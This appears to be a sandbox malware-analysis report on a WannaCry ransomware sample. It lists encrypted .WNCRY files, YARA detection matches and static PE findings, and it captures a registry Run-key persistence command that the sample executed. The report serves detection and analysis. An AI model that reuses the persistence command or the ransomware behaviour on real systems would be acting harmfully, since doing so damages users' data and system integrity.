              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js.WNCRY (copy) entropy: 7.99993659258Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.WNCRY (copy) entropy: 7.99978173165Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.WNCRY (copy) entropy: 7.99947247013Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js.WNCRY (copy) entropy: 7.999665421Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js.WNCRY (copy) entropy: 7.99945924919Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js.WNCRY (copy) entropy: 7.99962405057Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.WNCRY (copy) entropy: 7.99985609024Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRY (copy) entropy: 7.99830908732Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRY (copy) entropy: 7.99232234311Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRY (copy) entropy: 7.99344735166Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db.WNCRY (copy) entropy: 7.99216786916Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRY (copy) entropy: 7.99029985807Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{0F504D63-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRY (copy) entropy: 7.99946936059Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.WNCRY (copy) entropy: 7.99844297585Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db.WNCRY (copy) entropy: 7.99807296027Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRY (copy) entropy: 7.99984409515Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRY (copy) entropy: 7.99994586397Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRY (copy) entropy: 7.99992276638Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRY (copy) entropy: 7.9999175225Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRY (copy) entropy: 7.99709204301Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRY (copy) entropy: 7.99981831829Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRY (copy) entropy: 7.9998268972Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRY (copy) entropy: 7.99984567629Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRY (copy) entropy: 7.99984252764Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRY (copy) entropy: 7.99995861671Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRY (copy) entropy: 7.9946792705Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\96LGQ1XY\oneDs_f2e0f4a029670f10d892[1].js.WNCRY (copy) entropy: 7.99910031659Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GO30WR0E\ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2[1].js.WNCRY (copy) entropy: 7.99960802813Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NB937L4Q\ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOqiqEgQ2[1].js.WNCRY (copy) entropy: 7.99433722605Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRY (copy) entropy: 7.99981528995Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\1MHJ0V8H\pwa-bootstrap-5e7af218e953d095fabf[1].js.WNCRY (copy) entropy: 7.99778880267Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\1MHJ0V8H\pwa-bundle-3a99f64809c6780df035[1].js.WNCRY (copy) entropy: 7.99986040046Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\1SILG4EA\otel-logger-104bffe9378b8041455c[1].js.WNCRY (copy) entropy: 7.99808331347Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\1SILG4EA\pwa-forms-group~mru~officeforms-group-forms~officeforms-my-forms~places.bcdc404c7fe22f14ccad.chunk.v7[1].js.WNCRY (copy) entropy: 7.99566898059Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\1SILG4EA\pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7[1].js.WNCRY (copy) entropy: 7.99536853058Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\1SILG4EA\pwa-vendor-bundle-ba2888a24179bf152f3d[1].js.WNCRY (copy) entropy: 7.99973074517Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\1SILG4EA\pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7[1].js.WNCRY (copy) entropy: 7.99166155463Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\1SILG4EA\sharedscripts-939520eada[1].js.WNCRY (copy) entropy: 7.99664912454Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\5HU7WKQ3\pwa-mru.2ce72562ad7c0ae7059c.chunk.v7[1].js.WNCRY (copy) entropy: 7.99560382737Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\DIYKGEYO\microsoft-365-logo-01d5ecd01a[1].png.WNCRY (copy) entropy: 7.99229793401Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.edb.WNCRY (copy) entropy: 7.99988221311Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRY (copy) entropy: 7.99986479978Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\1Sd5265G8OlnRColAI8O_SxSQ1Q.br[1].js.WNCRY (copy) entropy: 7.99852740324Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\1_gc11zDuaJOyBP7gyptBGdPRf4.br[1].js.WNCRY (copy) entropy: 7.99672025624Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js.WNCRY (copy) entropy: 7.9960897084Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\6hU_LneafI_NFLeDvM367ebFaKQ[1].js.WNCRY (copy) entropy: 7.99294532494Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\6qhc82nhlRe74lC1CBjrzThsaXw.br[1].js.WNCRY (copy) entropy: 7.99565098819Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js.WNCRY (copy) entropy: 7.99861120761Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\D-oNnp40DqC4OQCR13oBZlsQ7cc.br[1].js.WNCRY (copy) entropy: 7.99035316616Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js.WNCRY (copy) entropy: 7.99850339692Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\f8FI06PDUmw1Zws81nUDYY3bWsY.br[1].js.WNCRY (copy) entropy: 7.99603172429Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\HSDak9V_lmtkNU64sorwQW-6T38.br[1].js.WNCRY (copy) entropy: 7.99987969309Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\Ix6gLNUjdsfo1b44Xv9sX0Ilnxw.br[1].js.WNCRY (copy) entropy: 7.99746672381Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\Kwh038ybdvX_puLwdopqHydJtVM.br[1].js.WNCRY (copy) entropy: 7.9995860221Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\lh0O3d6Fmm9PYPDqG8PqHJ4MS7w.br[1].js.WNCRY (copy) entropy: 7.99745394441Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\lpbsfnKE_8agtRF97FH08WFLR1w.br[1].js.WNCRY (copy) entropy: 7.99945523185Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js.WNCRY (copy) entropy: 7.99842479811Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\MR6Zgdyo2coaDBmJxRBOLkPvlpk.br[1].js.WNCRY (copy) entropy: 7.99935784044Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\Ov6JSivEymftttgBEDwd3JIRgz0.br[1].js.WNCRY (copy) entropy: 7.99910287575Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\RfoQ_WQ8YccBpTTC1JFx7r-9GWU.br[1].js.WNCRY (copy) entropy: 7.99908198938Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\u9BHPK6Ysm_7E45ERhG9lu3epIw.br[1].js.WNCRY (copy) entropy: 7.99685924211Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\UHyc3IjuWFO6s9IoOlmmJWw7Jqs.br[1].js.WNCRY (copy) entropy: 7.99968258653Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\x9TiBFKPhYF4yOf0IfKaPIf64qI.br[1].js.WNCRY (copy) entropy: 7.99851960536Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\xO01H2dEYfjtj69ouv_nR5Al0cU.br[1].js.WNCRY (copy) entropy: 7.99886322641Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\LV79ZGKN\11\ZNvOyS-r2rT3Al22ByUYXLQ5kPY.br[1].js.WNCRY (copy) entropy: 7.99818001682Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\1J0BS9YB\Dm5sMNO8Bp1gDqDK-DbxdfDD0W4[1].js.WNCRY (copy) entropy: 7.99658945458Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\VR1R6S8L\X6j0qPgNij1n_IogMJrgYaT9Kp8[1].js.WNCRY (copy) entropy: 7.99211679504Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRY (copy) entropy: 7.99986745137Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRY (copy) entropy: 7.99989916794Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg.WNCRY (copy) entropy: 7.99835456706Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg.WNCRY (copy) entropy: 7.99846396416Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cert9.db.WNCRY (copy) entropy: 7.99925338246Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\key4.db.WNCRY (copy) entropy: 7.99934431331Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Temp\39.WNCRYT (copy) entropy: 7.99939462751Jump to dropped file
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\user\AppData\Local\Temp\73.WNCRYT (copy) entropy: 7.99932285811Jump to dropped file

              System Summary

              barindex
              Source: WannaCry.bin, type: SAMPLEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: WannaCry.bin, type: SAMPLEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: WannaCry.bin, type: SAMPLEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 0000000F.00000000.1444934334.000000000040E000.00000008.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
              Source: C:\Users\user\Desktop\r.wnry, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
              Source: C:\Users\user\Desktop\u.wnry, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: C:\Users\user\Desktop\WannaCry.bin, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: C:\Users\user\Desktop\WannaCry.bin, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: C:\Users\user\Desktop\WannaCry.bin, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: C:\Users\user\Desktop\WannaCry.exeProcess Stats: CPU usage > 24%
              Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\@WanaDecryptor@.exe B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
              Source: WannaCry.bin.11.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
              Source: taskdl.exe.15.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: libeay32.dll.79.drStatic PE information: Number of sections : 18 > 10
              Source: libssp-0.dll.79.drStatic PE information: Number of sections : 17 > 10
              Source: libevent_extra-2-0-5.dll.79.drStatic PE information: Number of sections : 17 > 10
              Source: ssleay32.dll.79.drStatic PE information: Number of sections : 18 > 10
              Source: libevent-2-0-5.dll.79.drStatic PE information: Number of sections : 17 > 10
              Source: libevent_core-2-0-5.dll.79.drStatic PE information: Number of sections : 17 > 10
              Source: libgcc_s_sjlj-1.dll.79.drStatic PE information: Number of sections : 17 > 10
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hdahtimfel691" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
              Source: WannaCry.bin, type: SAMPLEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: WannaCry.bin, type: SAMPLEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: WannaCry.bin, type: SAMPLEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 0000000F.00000000.1444934334.000000000040E000.00000008.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\Desktop\r.wnry, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
